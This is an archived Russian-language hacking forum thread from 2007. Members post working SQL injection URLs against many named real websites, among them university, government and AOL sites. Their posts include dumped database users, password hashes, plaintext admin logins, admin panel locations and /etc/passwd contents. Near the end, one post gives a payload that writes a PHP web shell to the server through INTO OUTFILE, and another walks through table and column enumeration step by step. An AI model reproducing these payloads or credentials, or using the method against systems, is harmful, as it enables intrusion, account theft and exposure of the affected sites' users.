Если покопаться, то наверное можно найти логины и пассы к Grant Login

WWW.VIBORI.INFO
http://www.vibori.info/news/article.php?id=-5200+union+select+1,concat(id,0x3a,name,0x3a,secon d_name,0x3a,last_name,0x3a,email,0x3a,password,0x3 a,url,0x3a,heading),3,4,5,6,7,8,9,10,11,12,13+from +authors+limit+0,1/*
Версия: 5.0.45-log
Юзер: u8875@10.10.10.211

WWW.KUPI.TV
http://www.kypi.tv/catalog.php?id=-137+union+select+1,2,3,4,5,6,concat(login,char(58) ,password),8,9+from+fs_admin+limit+1,11/*
Версия: 5.0.45-log
Юзер: u57027@10.10.10.214
admin:4f7e11633b3f8e44b442d79f35dd540d:maximus
Странно, но пасс к админке ( www.kypi.tv/admin/ ) не подходит

WWW.KUBTELECOM.KUBAN.TV
http://www.kubtelecom.kuban.tv/press.php?a=v&id=-20+union+select+1,2,3,user,password,6,7,8+from+mys ql.user+limit+0,1/*
Версия: 4.0.10-gamma
Юзер: root@localhost

WWW.PRIORITET.TV
http://www.prioritet.tv/pages/analitic_info.php?themeID=-125+union+select+1,2,3,4,5,6,7,8,9/*
Версия: 4.1.22
Юзер: u_prioritet@localhost

SWAT

17.12.2007, 03:56

http://vkus.by/index.php?n=-416+union+select+1,2,VERSION(),4,5,6/*

http://www.cfis.by/news.php?id=-43+union+select+1,VERSION(),3,4,5/*

http://www.sovadmin.gomel.by/news.php?id=-1336+union+select+1,VERSION(),3,4,5,6,7,8,9/*

http://www.tc-europa.by/news.php?id=-69+union+select+1,VERSION(),3,4,5,6,7,8,9/*

SWAT

17.12.2007, 04:25

http://www.propertiesbulgaria.biz/news.php?id=-3+union+select+1,concat_ws(0x203a20,username,passw ord),3+from+admin_users/*

http://www.lanlords.biz/news.php?id=-5+union+select+1,2,3,VERSION(),5/*

-=lebed=-

17.12.2007, 17:59

everyfsbo.com - х.е.з что за хрень, похоже на ханипот или похекале уже...

_http://www.everyfsbo.com/fullnews.php?id=17+union+select+1,concat(version() ,0x3a,user(),0x3a,database()),null,null,null/*
_http://www.everyfsbo.com/fullnews.php?id=17+union+select+1,concat(name,0x3a ,password,0x3a),null,null,null+from+admin+limit+0, 1/*

.Begemot.

17.12.2007, 19:50

www.lancsfirerescue.org.uk

http://www.lancsfirerescue.org.uk/lfrs/fire_stations/your_station.php?id=3+union+select+0,1,concat(USER (),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6,7,8,9,1 0,11,12,13,14,15/*

USER:lancsfire@localhost
VERSION:4.1.22-standard-log
DATABASE:lfrs_new

SWAT

17.12.2007, 20:05

http://www.stockit.biz/news.php?newsid=-31456+union+select+1,2,3,4,5,6,7,8,9,10,11+from+ad min_users/*

5taY3r

17.12.2007, 21:24

http://www.nlpfurniture.com/catalog.php?id=-3+union+select+1,aes_decrypt(aes_encrypt(version() ,0x71),0x71),3,4,5,6,7,8,9,10,11,12,13/*4.1.16-standard

www.kelleykreations.com
http://www.kelleykreations.com/catalog/catalog.php?id=-70+union+select+1,version()/*4.0.27-standard
http://www.kelleykreations.com/catalog/catalog.php?id=-70+union+select+1,concat_ws(0x3a,username,password )+from+users/*sfiori:b3ff54a6d1fe0cb5be
kkelley:ac22079d7c8421fb5

v1ru$

17.12.2007, 21:59

Для одептов по бруту таблиц в 4 мускуле)

http://www.noborder.org/actionday2005/display.php?id=-334+union+select+1,concat(user(),0x3a,database(),0 x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27/*

paul@localhost:nob:4.1.22

http://www.shina-z.ru/shop.php?id=-8+UNION+SELECT+1,2,3,concat(user(),0x3a,database() ,0x3a,version()),5/*

www_shina_z@localhost:www_shina_z:4.1.20

http://www.fondationbrigittebardot.fr/site/actu.php?id=40103+union+select+1,aes_decrypt(aes_e ncrypt(concat(version(),0x3a,user(),0x3a,database( ),0x71),0x71),0x71)/*

4.1.11-Debian_4sarge7-log:fonbriba@localhost:fonbriba2q

http://www.harlemstage.org/SEASON/index.php?id=-1+union+select+1,2,concat(user(),0x3a,database(),0 x3a,version()),4,5,6/*

harlem_5@209.68.4.232:harlem_live:4.1.20-log

http://www.giuciao.com/books/book.php?id=-4506+union+select+1,2,3,aes_decrypt(aes_encrypt(co ncat(version(),0x3a,user(),0x3a,database(),0x71),0 x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25/*

4.1.11-Debian_4sarge7:bookhtml93843@217.64.202.205:bookht ml93843q

http://www.touchandgorecords.com/bands/band.php?id=84+UNION+SELECT+concat(user,0x3a,passw ord),2,3,4,5,6,7,8+from+mysql.user/*

5й мускул
root:3553f4a3048036eb
pma:3553f4a3048036eb

ПР-6

http://www.podiobooks.com/podiobooks/book.php?ID=76+union+select+1,concat(user,0x3a,pas sword),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30+from+mysql.user/*

root:5f33e327790317f7
есть таблица podiobooks.user

http://www.podiobooks.com/podiobooks/book.php?ID=76+union+select+1,column_name,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30+from+information_schema.columns +where+table_name=0x75736572+and+table_schema=0x70 6F64696F626F6F6B73+limit+1,1/*

Nea7

17.12.2007, 22:09

http://www.nlpfurniture.com/catalog.php?id=-3+union+select+1,aes_decrypt(aes_encrypt(version() ,0x71),0x71),3,4,5,6,7,8,9,10,11,12,13/*4.1.16-standard

;/ttp://nlpfurniture.com/admin/admin.php
User Name : admin
Password: admin

l-l00K

17.12.2007, 22:09

na.justsystems.com
http://na.justsystems.com/content.php?page='+union+select+1,2,3,4,5,6,7,8,9, 0,1,2,concat_ws(char(58),version(),user(),database ())+--+
4.1.20:root@localhost:test

efamily.ru
etc/passwd
http://efamily.ru/index.phtml?aid=-733+union+select+1,LOAD_FILE('/etc/passwd'),3,4,5,6,7,8,9,9+--+&id=101&page=40003
http://efamily.ru/index.phtml?aid=-733+union+select+1,concat_ws(':',version(),user(), database()),3,4,5,6,7,8,9,9+--+&id=101&page=40003
5.0.41:root@localhost:efamilydb

admin:fc6c29424966a311699ab00aaf76e813:14921980

bemowa.pl
http://www.bemowa.pl/portal/articles.php?topic=-8+union+select+1,concat_ws(char(58),version(),user (),database()),3,4,5+--+
5.0.27-standard:bemowa_admin@localhost:bemowa_forum
http://www.bemowa.pl/portal/articles.php?topic=-8+union+select+1,concat_ws(char(59),username,user_ password,user_icq),3,4,5+fROM%20phpbb_users+limit+ 9,1+--+
jp_admins(id,nick,pass)
jp_users(nick,pass)
Administrator:c04c038512eda0ad1d1b81f07597e336

allxbox.com
http://www.allxbox.com/pricesearch/cheats.asp?id=707038+or+1=(select%20db_name())--
version: Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
user: games_public
dbname:VideoGames
Forum
http://www.allxbox.com/forum/forum.asp?FORUM_ID=10+or+1=(select%20TOP+1+column_ name+from+information_schema.columns+where+table_n ame='FORUM_MEMBERS'+and+column_name+not+in+('MEMBE R_ID','M_STATUS','M_NAME','M_USERNAME','M_PASSWORD ','M_EMAIL','M_COUNTRY','M_HOMEPAGE','M_SIG','M_DE FAULT_VIEW','M_LEVEL','M_AIM','M_YAHOO','M_ICQ'))--&CAT_ID=1&Forum_Title=Gamewatcher+News+%26+Views

Admin:maxwell326

fwnetwork.com
http://www.fwnetwork.com/freeware/products/network_internet/download_managers/all/421+union+select+1,2,concat_ws(char(58),cast(versi on()+as+binary),cast(user()+as+binary),cast(databa se()+as+binary)),4,5+--+
4.1.12-standard-log:fwn@localhost:fwn

gta.cz
http://www.gta.cz/sanandreas/index.php?clanek=62'AND%20substring(version(),1,1) =%225%22+--+
слепая скуля, мускл 5 ветки

gtavicecitystories-fr.net
http://www.gtavicecitystories-fr.net/?page=article&id=1114823+union+select+1,concat_ws(char(58),versi on(),user(),database()),3,4,5,6,7,8,9,0,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28+--+
5.0.32-Debian_7etch3-log:forums@localhost:forums
хэши:
http://www.gtavicecitystories-fr.net/?page=article&id=1114823+union+select+1,concat_ws(char(58),conve rge_pass_hash,converge_pass_salt),3,4,5,6,7,8,9,0, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28+from+ibf_members_converge+--+

sts.su
http://www.sts.su/index.php?navig=news&news_num=-204+union+select+1,2,concat_ws(char(58),version(), database(),user()),4,5,6,7,8+--+
5.0.45-log:sts596:sts596@217.112.35.27
пользователи:
http://www.sts.su/index.php?navig=news&news_num=-204+union+select+1,2,concat_ws(char(58),name,passw ord),4,5,6,7,8+from+sts_users+limit+2,1+--+

4Dfx

17.12.2007, 22:43

http://www.bmoca.org/artist.php?id=-1+union+select+1,username,password,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+ users/*
login: bmoca
password: !750BMoC@roses
Админка: http://www.bmoca.org/admin/
P.S. Есть инфа по картону!!!

ZAMUT

17.12.2007, 22:59

.EDU
housing.wisc.edu
http://www.housing.wisc.edu/resnet/news/story.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database()),7,8,9,10/*4.1.20-log:root@jupiter.housing.wisc.edu:news
http://www.housing.wisc.edu/resnet/news/story.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user,passw ord),7,8,9,10+from+mysql.user+limit+1,1/*
root:1d7061767ec0f189:ipaudit
Можем почитать файлы на сервере..
/etc/passwd
http://www.housing.wisc.edu/resnet/news/story.php?id=-1+union+select+1,2,3,4,5,load_file(0x2F6574632F706 173737764),7,8,9,10/*

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin desktop:x:80:80:desktop:/var/lib/menu/kde:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin pvm:x:24:24::/usr/share/pvm3:/bin/bash infotech:x:500:500:infotech:/home/infotech:/bin/bash nagios:x:100:101:nagios:/var/log/nagios:/bin/sh radiusd:x:95:95:radiusd user:/:/bin/false cvs:x:504:506::/home/cvs:/bin/bash dbus:x:81:81:System message bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin htt:x:101:102:IIIMF Htt:/usr/lib/im:/sbin/nologin gkrellmd:x:505:507::/home/gkrellmd:/bin/bash mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash rpm:x:37:37::/var/lib/rpm:/sbin/nologin hpsmh:x:79:79::/hpsmh:/sbin/nologin rancid:x:506:508::/home/rancid:/bin/bash squale:x:102:103:SQuaLe:/: cacti:x:103:104:cacti:/var/www/cacti:/bin/sh named:x:25:25:Named:/var/named:/sbin/nologin

SWAT

17.12.2007, 23:51

http://www.whitelight.biz/primapagina/news.php?id=-198+union+select+1,VERSION(),3,4,5,6/*

~EviL~

17.12.2007, 23:55

http://www.melainvest.com/boimazilki.php?pid=-62+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12/*&lang=bg

SWAT

18.12.2007, 00:00

http://volsk.info/news.php?id=9999999999+union+select+1,concat(name, 0x3a,email),3,4,5,6+from+ibf_members/*

http://www.mistwalker-fr.info/news.php?id=-229+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*

5taY3r

18.12.2007, 00:27

http://marcanderson.com.au/product_list.php?pg=1&id=-18'+union+select+version(),2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,user(),database(), 25/*5.0.26-standard-log
marc_and@localhost
marcanderson_com_au

fobofob

18.12.2007, 00:35

Мож кому-то и пригодится... ;) хотя как по мне,я этого не понимаю воoбще ,для чего все это нужно ?:(

StripShop.ru

код:

http://stripshop.ru/cat.php?id=-500+union+select+concat(uname,0x3a,pass)+from+stri p_users+limit+0,1/*

5 мускул

p.s у некоторых юзеров довольно приличные суммы на счету ;)

n0ne

18.12.2007, 02:02

linspire.com

http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-213+union+select+1,2/*

4.0.27-standard-log::::linspire@10.0.0.20

5taY3r

18.12.2007, 02:18

www.patio.com
http://patio.com/catalog.php?id=-82+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8,9,10,11,12,13,14,15,16,17, 18,19,20/*5.0.27_pat9663@localhost_patio_com
http://patio.com/catalog.php?id=-82+union+select+1,2,3,4,5,table_name,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20+from+information_schema. tables/*....таблицы>колонки
А вот дальше никак....( "Table 'patio_com.admin' doesn't exist" "SELECT command denied to user 'pat9663'@'localhost' for table 'admin'"

4Dfx

18.12.2007, 10:38

http://www.ethology.ru/library/?id=-1+union+select+1,2,3,4,5,login,passwd,8+from+ethol ogy_users+limit+2,1/*
Логины и пароли к закрытому форуму!!!

JIyka

18.12.2007, 11:41

http://www.mks-ks.ru/shop/cat.php?id=-1+union+select+1,2,3,concat(0x3a,version(),databas e(),user())/*

Iceangel_

18.12.2007, 11:46

fedor.bel.ru
Официальный сайт Федора Емельяненко
(кто не знает, он 4-х кратный чемпион мира по самбо)

http://fedor.bel.ru/?id=-147+UNION+SELECT+1,concat(login,0x3a,password),3,4 ,5,6,7,8,9+from+users+limit+0,3/*

5.1.19-beta-log

логин:joerg32
пароль:joerg321

Там есть магазин, как раз к нему пароль и подошел... ;-)

fRg

18.12.2007, 16:31

Для 5taY3r

Ищешь табы:http://patio.com/catalog.php?id=-82+union+select+1,2,3,4,5,table_name,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20+from+information_schema. tables+limit+17,1/* Например, находишь табу tbladminusers
Смотришь в ней поля:http://patio.com/catalog.php?id=-82+union+select+1,2,3,4,5,column_name,7,8,9,10,11, 12,13,14,15,16,17,18,19,20+from+information_schema .columns+where+table_name=0x74626C61646D696E757365 7273+limit+1,1/* Видим поля userID и patiopassword
Смотрим кто там:http://patio.com/catalog.php?id=-82+union+select+1,2,3,4,5,concat_ws(0x3a,userID,pa tiopassword),7,8,9,10,11,12,13,14,15,16,17,18,19,2 0+from+tbladminusers+limit+0,1/* Сидит там [ логин : пасс ]:patioadmin:furnitureЭтот для смеха тут сидит, а этот patio : pat9663 АДМИН!!!

И всего-то делов! ;)

В дополнение можно раскопать, что логин и пасс админа подходят к ftp.patio.com ...
Ну а с этим можно и поиграться! :D

K1nD[e]R

18.12.2007, 19:16

http://www.xoxox.ru/news.php?id=-96+union+select+1,2,version(),4,5,6,concat_ws(0x2F ,brand_id,name),8+from+brands/*
Version 5.0.45-log

.Begemot.

18.12.2007, 19:20

rfbd.ru

http://www.rfbd.ru/cat.php?rubrika=1+union+select+0,VERSION(),USER(), 3,DATABASE(),5,6,7,8,9,10,11,12,13/*

USER:a1rfbd_guest@localhost
VERSION:5.0.37-standard-log
DATABASE:a1rfbd_ric_datebase

Вывод названий всех таблиц (information_schema.tables) -
http://www.rfbd.ru/cat.php?rubrika=1+union+select+0,concat(USER(),VER SION(),DATABASE()),concat(Table_name),3,4,5,6,7,8, 9,10,11,12,13+from+information_schema.tables/*

Вывод названий всех колон (information_schema.columns) -
http://www.rfbd.ru/cat.php?rubrika=1+union+select+0,concat(USER(),VER SION(),DATABASE()),concat(Column_name),3,4,5,6,7,8 ,9,10,11,12,13+from+information_schema.columns/*

Это не баян и раскрутил всё что смог, а плюсеГ так и не пиставили, обидно. :(

Neovild

18.12.2007, 20:19

Моя первая скуль-инъекция (только неполная; нашел количество столбцов и поле для вывода)
http://www.softmart.ru/comp/show_prog.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12/*

~EviL~

18.12.2007, 22:04

http://www.expert-bdd.com/arhiv.php?id=-4+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,version(),12,1 3,14,15/*

http://www.expert-bdd.com/arhiv.php?id=-4+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,concat(name,0x 3a,password,0x3a,email),12,13,14,15+FROM+admins/*

Митко:cf9fb3872eced13b0deceb1eb6595442:
Кирил:646e5563343543ac1f3871e4bb2d33f7:cyril@ intermedia.bg:lipa4

http://www.expert-bdd.com/arhiv.php?id=-4+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,LOAD_FILE('/etc/passwd'),12,13,14,15/*

JIyka

18.12.2007, 23:18

http://www.a2k.org.ua/news.php?id=-1567+union+select+1,2,3,4,concat_ws(0x3a,user,pass word),
6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,
27,28,29,30,31,32,33,34,35,36,37,38+from+users+lim it+7,1/*

admin:d23d8b79f575bcc0eedfb8c4e2f13540:repz
privacy:21cec257feb15bcc84e0acd5b0773883:privacy
irina:e67ccf0c31412f5905978cd805a6a432:rf2005
editor:d7d2105b3178dea4921b7748bc4e71eb:maidan

JIyka

19.12.2007, 01:19

http://www.mywatches.ru/page.php?n=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4/*

5.0.45-log:u80484@10.10.223.245:u80484

Neovild

19.12.2007, 01:53

2 часа сидел и никак не подобрал столбцы
http://www.rabotamania.ru/index.php?id=-1+union+select+concat_ws(0x3a,version(),user(),sys tem_user(),database()),2,3,4,5,6,7,8,9,10+from+rab otamania_pages/*
http://studyport.info/viewdetails.php?id=-1+Union+select+1,concat_ws(0x3a,version(),user()%2 0,database()),3,4,5,6,7,8,9,10,11,12,13,14,15/*

fRg

19.12.2007, 14:45

Готовлю большую заготовку по Франции...

Пока только мелочь...

yack.frhttp://yack.fr/yack/index.php?mainFrame=actu.php%3Fid_actu%3D-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), database(),user()),7,8,9,10/*4.0.24_Debian-10sarge2-log:user_2657:user_2657@192.168.1.151
Таблицы:actu
actu_theme
categorie
devis
document
dpt
famille
marque
part_dpt
partenaire
produit
reference
secteurЧёт ни админских, ни юзерских таб не нашёл ... :mad:

promo-web.orghttp://www.promo-web.org/forum/viewtopic.php?TopicID=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4/* 4.1.22-standard : promoweb : promoweb@localhost

159932

19.12.2007, 15:01

http://www.protruck.ru/catalogue.php?gid=80+union+select+1,2,3,4,5,6,7,co ncat(srv_login,0x3a,srv_passw),9,0,1,2,3+from+prot ruck_users/*
5ая
admin:12345

Iceangel_

19.12.2007, 15:08

www.prosambo.com
http://www.prosambo.com/index.php?razdel=news&id=-28+UNION+SELECT+1,2,3,4,5,6,version()/*
Сайт самбистов...(не подумайте что я не люблю спорт... =) )
5.0.45

vostokmedia.com
http://vostokmedia.com/news.details.php?id=-7269+UNION+SELECT+1,2,3,version(),5,6,7,8,9,10,11, 12,13,14,15/*
Сайт Информационного агенства "Восток Медиа"
4.1.22-standard-log

www.gazeta-vv.ru
http://www.gazeta-vv.ru/?action=arh&number=98&id=-667+UNION+SELECT+1,2,3,4,concat(user,0x3a,password ),6,7,8,9,10,11,12,13+from+mysql.user/*
Сайт какой-то газеты...
4.0.18

user:agata
hash:4462ead17d29e68b

www.lyapis.com
http://www.lyapis.com/articles.php?id=-127+UNION+SELECT+1,2,3,4,5,6,7,8,9/*
Официальный сайт Ляписа Трубецкого
4.1.22-standard

sovadmin.gomel.by
http://www.sovadmin.gomel.by/news.php?id=-842+UNION+SELECT+1,version(),3,4,5,6,7,8,9/*
Официальный сайт администрации Советского района г. Гомеля
4.0.18

SWAT

19.12.2007, 17:48

http://www.camellia-flowers.ru/news.php?id=-16+union+select+1,VERSION(),3,4,5,6/*

ElteRUS

19.12.2007, 21:45

http://www.charlotte.ru/?page=item&id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9,10/*

4.1.20/charlotte/charlotte@localhost

http://www.charlotte.ru/?page=item&id=-1+union+select+1,concat_ws(0x2F,login,password,ema il),3,4,5,6,7,8,9,10+from+users+limit+0,1/*

логин/пароль/мейл
Timur/zxcv5/akinshin@diona.ru

JIyka

20.12.2007, 01:46

http://www.topculturism.ro/viewdetails.php?t=2&id=-5+union+select+version(),2/*

Loker

20.12.2007, 02:05

http://www.aobg.org/forum/post.php?id=-372+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(conca t(User_name,password),0x71),0x71),4,5,6,7,8,9,10+f rom+users+limit+1,1
какойто балгарский сайт
Вот Логин и Хеш
radoslav_radev:215c335921383a8a

JIyka

20.12.2007, 02:13

http://www.topfitness.ro/viewdetails.php?t=2&id=-2+union+select+concat_ws(0x3a,version(),user()),2, 3,4,5,6/*

JIyka

20.12.2007, 03:01

http://worldcondos.com/viewdetails.php?id=-1+union+select+1,2,concat_ws(0x3a,username,passwd, email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24+from+registered/*

JIyka

20.12.2007, 03:25

http://www.e-dereham.info/viewdetails.php?section=public&id=-1+union+select+1,concat_ws(0x3a,version(),user()), 3,4,5,6,7,8,9,10,11,12,13,14/*

JIyka

20.12.2007, 04:05

http://www.dc-autos.com/viewdetails.php?id=-1+union+select+1,convert(concat_ws(0x3a,version(), user(),database())+using+latin1),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22/*

n0ne

20.12.2007, 11:20

phpbuddy.com

http://www.phpbuddy.com/article.php?id=-8+union+select+concat(user(),0x3a,database(),0x3a, version()),2,3,4,5,6/*

phpbud22_phpbudd@localhost::phpbud22_phpbuddy::4.1 .21-standard

SWAT

20.12.2007, 14:49

http://www.tooltime.nl/pagina.php?id=-2+union+select+1,2,concat(id,0x3a,name)+from+admin/*

ZAMUT

20.12.2007, 17:42

.еда
classes.design.ucla.edu
http://classes.design.ucla.edu/Fall05/28/index_visor.php?id=3&ejercicio_id=15&persona_id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),database()),6,7,8+--+ 5.0.22:reas@ha.design.ucla.edu:F0528
west.stanford.edu
http://west.stanford.edu/cgi-bin/pager.php?id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase()),2,3,4,5+--+ 5.0.45-3-log:gwestwest@www3.Stanford.EDU:g_west_west

.Begemot.

20.12.2007, 18:08

kniga-market.kiev.ua

http://www.kniga-market.kiev.ua/producers.php?category=1+union+select+0,1,concat(U SER(),0x3a,VERSION(),0x3a,DATABASE()),3/*

USER:u_knigamarke@localhost
VERSION:4.1.22
DATABASE:knigamarket

ak-TEP

20.12.2007, 18:53

Tigger

20.12.2007, 21:11

TEAM MUSLEMEN

20.12.2007, 21:26

HelO :D

http://www.topfitness.ro

http://www.topfitness.ro/viewdetails.php?t=2&id=-2+union+select+1,2,3,user,5,6/**/from/**/mysql.user

USER
SORS

http://www.topfitness.ro/viewdetails.php?t=2&id=-2+union+select+1,2,3,password,5,6/**/from/**/mysql.user

pass hash MYSQL
255B543308FCC38F

admin panel
http://www.topfitness.ro/admin/

TEAM MUSLEMEN

20.12.2007, 23:13

ability.aol.com
http://ability.aol.com/ability/index.php?ID=45&catID=-6+union+select+1,convert(concat_ws(0x3a,version(), user(),database())+using+latin1)
4.1.14-standard-log:ability_admin@64.12.167.11:aol_ability
good :D

http://ability.aol.com/ability/index.php?ID=1&catID=-1/**/union/**/select/**/11111,22222/**from/**/user

from name (USER) ;)

TEAM MUSLEMEN

20.12.2007, 23:44

http://www.tymoshchuk.com/news.php?id=394+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* подобрал пароль и юзера....а вот админку райти не могу....помагите найти плизз))

Excellent work

Continued

http://www.tymoshchuk.com/news.php?id=394+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,user,14,15,16,17,18,19,20,pass,22,23,24,25,2 6/**/from/**/users

use name
Usama

password hash
dcddb75469b4b4875094e14561e573d8

end password is

00000

Tigger You are excellent ;)
:D :D :D :D :D

~EviL~

21.12.2007, 00:15

http://www.archaeolog.ru/index.php?id=2&id_nws=58+UNION+SELECT+1,2,3,4,concat(login,0x3a,p ass,0x3a,email),6,7,8,9,10+FROM+userdata+LIMIT+1,1/*
Там же columns:
id, pid, fio, stepen, dolshnost, bio, login, pass, email, telephon :p

ZAMUT

21.12.2007, 01:35

http://www.trud.ru/issue/article.php?id=-200610131900802+UNION+SELECT+1,2,3,concat(user(),0 x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12, 13,14/*
Боян! Причем ты уже не первый кто за сегодня инъект на труде выкладывает =\\

netpingx

21.12.2007, 02:15

http://baltbay.com/index.php?bloks=2&sad=13+union+select+user,2,3,password,host,6,7,8,9 ,10,11,12,13+from+mysql.user/*

http://backipars.lv/kipars/index.php?sadala=13+union+select+user,2,3,password ,host,6,7,8,9,10,11,12,13+from+mysql.user/*

http://jauniesivero.lv/index.php?page=news&section=-1/**/union/**/select/**/11111,22222/**from/**/user

http://hostelturiba.lv/index.php?lang=13+union+select+user,2,3,password,h ost,6,7,8,9,10,11,12,13+from+mysql.user/*

5taY3r

21.12.2007, 10:52

www.unbureauenplus.frhttp://unbureauenplus.fr/index.php?dir=news&id=-7+union+select+concat_ws(0x3a,version(),user(),dat abase()),2,3/*5.0.44-log:unbureau_base1@10.0.78.3:unbureau_base1http://unbureauenplus.fr/index.php?dir=news&id=-7+union+select+concat_ws(0x3a,pseudo,passe),2,3+fr om+papa_admin/*
логин:пасс
omi:1905
админка:_http://unbureauenplus.fr/admin/login.php

Tigger

21.12.2007, 15:06

.Begemot.

21.12.2007, 15:26

Плиззз...ответьте на мой вопрос.
Я взломл сайт тимощука....http://www.tymoshchuk.com/news.php?id=394+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,user,14,15,16,17,18,19,20,pass,22,23,24,25,2 6+from+users/* там лежат пароли и логин...но админку найте не могу...и можете сказать где админка и к чему могут подходить эти проли?

login:Usama
hash пароля:dcddb75469b4b4875094e14561e573d8
пароль:00000

Можешь залить шелл через инжекцию и узнать где админка.
----------------------------------------------------------

ankor.ru

http://www.ankor.ru/cityDescr.php3?uid=60&cid=17+union+select+0,1,concat(USER(),0x3a,VERSION (),0x3a,DATABASE())/*

USER:ankor@pm29.zenon.net
VERSION:4.0.27-log
DATABASE:ankor

Tigger

21.12.2007, 16:09

Можешь залить шелл через инжекцию и узнать где админка.

Скажи пожалуйста как шелл залить?

ElteRUS

21.12.2007, 16:21

http://www.trizland.ru/task.php?id=-11+union+select+1,2,3,4,concat_ws(0x2F,cast(versio n()+as+binary),cast(database()+as+binary),cast(use r()+as+binary)),6,7,8,9/*

4.1.18/bin17www/bin17www-sql@way.hc.ru

-----------------------------------------------------------------------------

all-news.ru

http://www.all-news.ru/?nID=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7/*

5.0.45-log/u15215_2/u15215@10.10.10.205

http://www.all-news.ru/?nID=-1+union+select+1,concat_ws(0x2F,username,password, contact_email,contact_icq),3,4,5,6,7+from+u15215.z p_partners/*

логин/пароль/мейл/уин
runet/261072/wmcash@pochta.ws/

http://www.all-news.ru/?nID=-1+union+select+1,concat_ws(0x2F,login,password,ema il,authkey),3,4,5,6,7+from+u15215.users/*

логин/пароль/мейл/код авторизации
BaDGiRL/1791179/BadGiRL@mail.ru/

.Begemot.

21.12.2007, 16:50

Скажи пожалуйста как шелл залить?

http://www.site.ru/index.php?page=-1+union+select+1,2,,'<?php system($_GET[cmd]); ?>'+,4,5from+user+into+outfile+'/home/site/html/shell.php'/*

Такой запрос создаст шелл в директории "/home/site/html/"

----------------------------------------

cavs.msstate.edu

http://www.cavs.msstate.edu/projects.php?id=34&rgid=5+union+select+0,1,2,Concat(USER(),0x3a,VERSI ON(),0x3a,DATABASE()),4/*

USER:webdata@Infoserv.HPC.MsState.Edu
VERSION:5.0.24a-standard
DATABASE:webdata

Таблицы -
http://www.cavs.msstate.edu/projects.php?id=34&rgid=5+union+select+0,1,2,Concat(USER(),0x3a,VERSI ON(),0x3a,DATABASE(),0x3a,Table_name),4+from+infor mation_schema.tables/*

Колонны -
